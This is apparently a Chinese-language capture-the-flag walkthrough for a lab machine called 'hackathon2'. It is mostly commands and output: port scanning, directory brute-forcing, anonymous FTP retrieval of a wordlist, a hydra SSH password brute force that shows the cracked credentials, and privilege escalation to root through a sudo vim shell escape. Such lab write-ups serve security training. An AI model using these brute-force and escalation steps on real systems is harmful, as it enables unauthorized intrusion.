信息收集:
$ sudo nmap -sT -p- 192.168.150.133
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
7223/tcp open unknown
$ sudo nmap -sV -sT -sC -O -p21,80,7223 192.168.150.133 -o nmap_all.txt
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.150.129
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 1000 1000 47 Jun 18 2021 flag1.txt
|_-rw-r--r-- 1 1000 1000 849 Jun 19 2021 word.dir
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_*/
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: hackathon2
7223/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 704aa969c2d1682386bd858331ca800c (RSA)
| 256 a69ea418ada42b7eeaf85e63296e4f24 (ECDSA)
|_ 256 4edba6d2ebb953a5d7210b4e57a5f5c1 (ED25519)
MAC Address: 00:0C:29:4C:E7:09 (VMware)
$ gobuster dir -u http://192.168.150.133 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,txt,html
/.html (Status: 403) [Size: 280]
/index.html (Status: 200) [Size: 1254]
/robots.txt (Status: 200) [Size: 70]
/happy (Status: 200) [Size: 110]
$ curl -L http://192.168.150.133/happy
找到注释信息
<!-- username: hackathonll >
FTP:
$ ftp 192.168.150.133
-rw-r--r-- 1 1000 1000 47 Jun 18 2021 flag1.txt
-rw-r--r-- 1 1000 1000 849 Jun 19 2021 word.dir
ftp>binary
ftp>get word.dir
获得一个字典
SSH爆破:
$ hydra -l hackathonll -P ./word.dir 192.168.150.133 -s 7223 ssh -f -vV
[7223][ssh] host: 192.168.150.133 login: hackathonll password: Ti@gO
$ ssh hackathonll@192.168.150.133 -p 7223
提权:
$ sudo -l
(root) NOPASSWD: /usr/bin/vim
$ sudo vim
:!/bin/bash
root@hackathon:/home/hackathonll#
# cat flag2.txt
₣Ⱡ₳₲{7e3c118631b68d159d9399bda66fc694}